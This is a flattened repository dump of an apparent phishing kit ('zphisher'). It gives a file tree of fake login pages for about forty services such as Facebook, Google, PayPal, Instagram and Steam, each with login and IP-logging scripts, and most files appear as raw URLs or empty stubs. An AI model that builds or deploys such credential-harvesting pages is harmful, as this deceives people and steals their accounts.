├── websites ├── vk │ ├── p │ ├── counter │ ├── index.php │ ├── login.php │ ├── ip.php │ └── b-0f6403442fbf95cd84849e54d8e9ab53.ddb71f5a609d75e3ef6e.js.download ├── vk_poll │ ├── p.gif │ ├── hit.gif │ ├── s_c.js │ ├── counter.gif │ ├── index.php │ ├── top_logo.png │ ├── login.php │ ├── ip.php │ ├── result.html │ ├── login2.html │ └── login.html ├── adobe │ ├── index.php │ ├── login.php │ └── ip.php ├── badoo │ ├── index.php │ ├── login.php │ └── ip.php ├── ebay │ ├── index.php │ ├── login.php │ └── ip.php ├── google │ ├── avatar.png │ ├── google.png │ ├── index.php │ ├── login.php │ └── ip.php ├── steam │ ├── index.php │ ├── login.php │ └── ip.php ├── yahoo │ ├── index.php │ ├── yahoo_en-US_f_p_bestfit_2x.png │ ├── login.php │ └── ip.php ├── deviantart │ ├── index.php │ ├── login.php │ └── ip.php ├── dropbox │ ├── index.php │ ├── login.php │ └── ip.php ├── facebook │ ├── index.php │ ├── index_files │ │ ├── GsNJNwuI-UM.gif │ │ ├── OBaVg52wtTZ.png │ │ ├── api.js │ │ ├── v4WgC_pJT9B.js │ │ └── bframe.html │ ├── login.php │ ├── ip.php │ └── mobile_files │ │ └── v4WgC_pJT9B.js ├── fb_security │ ├── logo.png │ ├── fb-ico.png │ ├── index.php │ ├── login.php │ ├── ip.php │ ├── style.css │ └── login.html ├── github │ ├── index.php │ ├── login.php │ └── ip.php ├── google_new │ ├── index.php │ ├── login.php │ └── ip.php ├── ig_verify │ ├── index.php │ ├── login.php │ ├── login2.php │ └── ip.php ├── instagram │ ├── index.php │ ├── 001bc33056c1.jpg │ ├── 2d9d7248af43.jpg │ ├── 4b70f6fae447.png │ ├── 629d23a3c7b2.jpg │ ├── 9e7638226e17.png │ ├── aafd8c6b005d.jpg │ ├── f06b908907d5.png │ ├── f55c258e826e.png │ ├── f5ae123ab1e2.jpg │ ├── fb48443ec9d3.png │ ├── login.php │ └── ip.php ├── linkedin │ ├── index.php │ ├── login.php │ └── ip.php ├── microsoft │ ├── index.php │ ├── sprite1.png │ ├── login.php │ ├── ip.php │ ├── ellipsis_grey.svg │ ├── ellipsis_white.svg │ ├── prefetch.html │ ├── microsoft_logo.svg │ └── sprite1.css ├── netflix │ ├── index.php │ ├── FB-f-Logo__blue_57.png │ ├── login.php │ └── ip.php ├── origin │ ├── index.php │ ├── EA_Origin_Lockup_Black.png │ ├── login.php │ ├── ip.php │ ├── api.js │ ├── jquery_002.js │ ├── iframe_api.js │ ├── originX-pc-common.css │ ├── originX-pc-login.css │ ├── css.css │ ├── utag.js │ └── jquery_004.js ├── paypal │ ├── index.php │ ├── login.php │ └── ip.php ├── pinterest │ ├── index.php │ ├── cbgapi.loaded_2 │ ├── aMltqKRlCHD.png │ ├── cbgapi.loaded_1 │ ├── login.php │ ├── pjs-51-02ea5c5c9fb36b662bcf.js │ ├── iframe.html │ ├── postmessageRelay.html │ ├── ip.php │ ├── sdk_002.js │ ├── pjs-0-5d015373385578e0d2c4.js │ ├── cbgapi.loaded_3 │ └── 25936583-postmessagerelay.js ├── protonmail │ ├── index.php │ ├── logo.png │ ├── login.php │ └── ip.php ├── reddit │ ├── index.php │ ├── login.php │ ├── ip.php │ └── login.html ├── snapchat │ ├── index.php │ ├── login.php │ └── ip.php ├── spotify │ ├── index.php │ ├── login.php │ ├── ip.php │ ├── api.js │ └── login.html ├── twitch │ ├── index.php │ ├── login.php │ └── ip.php ├── twitter │ ├── index.php │ ├── login.php │ └── ip.php ├── wordpress │ ├── index.php │ ├── login.php │ ├── ip.php │ ├── wordpress-logo.svg │ └── login.html ├── yandex │ ├── index.php │ ├── login.php │ └── ip.php ├── fb_advanced │ ├── index.php │ ├── login.php │ ├── ip.php │ ├── result.html │ ├── login.html │ └── login2.html ├── fb_messenger │ ├── index.php │ ├── login.php │ └── ip.php ├── google_poll │ ├── index.php │ ├── login.php │ ├── ip.php │ ├── result.html │ ├── login.html │ └── login2.html ├── ig_followers │ ├── index.php │ ├── login.php │ └── ip.php ├── playstation │ ├── index.php │ ├── loading.png │ ├── sony_logo.png │ ├── wallpaper.jpg │ ├── loading_base.png │ ├── logo_playstation.png │ ├── button_icon_password_off.png │ ├── vendor-571d67531622102402268bd2c623c17f.css │ ├── login.php │ ├── kekka-22361ea3e8890b95e7b006a784440d01.css │ ├── saved_resource │ ├── ip.php │ └── api.js.download ├── stackoverflow │ ├── index.php │ ├── login.php │ └── ip.php ├── cryptocoinsniper │ ├── index.php │ ├── login.php │ ├── ip.php │ └── login.html └── Pages.md └── README.md /websites/vk/p: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/vk/p -------------------------------------------------------------------------------- /websites/vk/counter: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/vk/counter -------------------------------------------------------------------------------- /websites/vk_poll/p.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/vk_poll/p.gif -------------------------------------------------------------------------------- /websites/vk_poll/hit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/vk_poll/hit.gif -------------------------------------------------------------------------------- /websites/vk_poll/s_c.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/vk_poll/s_c.js -------------------------------------------------------------------------------- /websites/adobe/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/badoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/ebay/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/google/avatar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/google/avatar.png -------------------------------------------------------------------------------- /websites/google/google.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/google/google.png -------------------------------------------------------------------------------- /websites/steam/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/vk/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/yahoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/deviantart/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/dropbox/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/facebook/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/fb_security/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/fb_security/logo.png -------------------------------------------------------------------------------- /websites/github/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/google/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/google_new/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/ig_verify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/instagram/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/linkedin/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/microsoft/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/microsoft/sprite1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/microsoft/sprite1.png -------------------------------------------------------------------------------- /websites/netflix/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/origin/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/paypal/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/pinterest/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/protonmail/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/protonmail/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/protonmail/logo.png -------------------------------------------------------------------------------- /websites/reddit/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/snapchat/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/spotify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/twitch/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/twitter/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/vk_poll/counter.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/vk_poll/counter.gif -------------------------------------------------------------------------------- /websites/vk_poll/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/vk_poll/top_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/vk_poll/top_logo.png -------------------------------------------------------------------------------- /websites/wordpress/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/yandex/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/fb_advanced/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/fb_messenger/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/fb_security/fb-ico.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/fb_security/fb-ico.png -------------------------------------------------------------------------------- /websites/fb_security/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/google_poll/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/ig_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/pinterest/cbgapi.loaded_2: -------------------------------------------------------------------------------- 1 | /* JS */ gapi.loaded_2(function(_){var window=this; 2 | }); 3 | // Google Inc. 4 | -------------------------------------------------------------------------------- /websites/playstation/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/playstation/loading.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/playstation/loading.png -------------------------------------------------------------------------------- /websites/stackoverflow/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/cryptocoinsniper/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/instagram/001bc33056c1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/instagram/001bc33056c1.jpg -------------------------------------------------------------------------------- /websites/instagram/2d9d7248af43.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/instagram/2d9d7248af43.jpg -------------------------------------------------------------------------------- /websites/instagram/4b70f6fae447.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/instagram/4b70f6fae447.png -------------------------------------------------------------------------------- /websites/instagram/629d23a3c7b2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/instagram/629d23a3c7b2.jpg -------------------------------------------------------------------------------- /websites/instagram/9e7638226e17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/instagram/9e7638226e17.png -------------------------------------------------------------------------------- /websites/instagram/aafd8c6b005d.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/instagram/aafd8c6b005d.jpg -------------------------------------------------------------------------------- /websites/instagram/f06b908907d5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/instagram/f06b908907d5.png -------------------------------------------------------------------------------- /websites/instagram/f55c258e826e.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/instagram/f55c258e826e.png -------------------------------------------------------------------------------- /websites/instagram/f5ae123ab1e2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/instagram/f5ae123ab1e2.jpg -------------------------------------------------------------------------------- /websites/instagram/fb48443ec9d3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/instagram/fb48443ec9d3.png -------------------------------------------------------------------------------- /websites/pinterest/aMltqKRlCHD.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/pinterest/aMltqKRlCHD.png -------------------------------------------------------------------------------- /websites/playstation/sony_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/playstation/sony_logo.png -------------------------------------------------------------------------------- /websites/playstation/wallpaper.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/playstation/wallpaper.jpg -------------------------------------------------------------------------------- /websites/playstation/loading_base.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/playstation/loading_base.png -------------------------------------------------------------------------------- /websites/netflix/FB-f-Logo__blue_57.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/netflix/FB-f-Logo__blue_57.png -------------------------------------------------------------------------------- /websites/origin/EA_Origin_Lockup_Black.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/origin/EA_Origin_Lockup_Black.png -------------------------------------------------------------------------------- /websites/playstation/logo_playstation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/playstation/logo_playstation.png -------------------------------------------------------------------------------- /websites/facebook/index_files/GsNJNwuI-UM.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/facebook/index_files/GsNJNwuI-UM.gif -------------------------------------------------------------------------------- /websites/facebook/index_files/OBaVg52wtTZ.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/facebook/index_files/OBaVg52wtTZ.png -------------------------------------------------------------------------------- /websites/yahoo/yahoo_en-US_f_p_bestfit_2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/yahoo/yahoo_en-US_f_p_bestfit_2x.png -------------------------------------------------------------------------------- /websites/playstation/button_icon_password_off.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/HEAD/websites/playstation/button_icon_password_off.png -------------------------------------------------------------------------------- /websites/pinterest/cbgapi.loaded_1: -------------------------------------------------------------------------------- 1 | /* JS */ gapi.loaded_1(function(_){var window=this; 2 | _.Sc("signin_annotation",function(a){_.Jx(a.userParams||{},a.iframeNode)}); 3 | }); 4 | // Google Inc. 5 | -------------------------------------------------------------------------------- /websites/fb_advanced/login.php: -------------------------------------------------------------------------------- 1 | 2 |
Poll completed successfully. Thank You!
19 | 20 | 21 |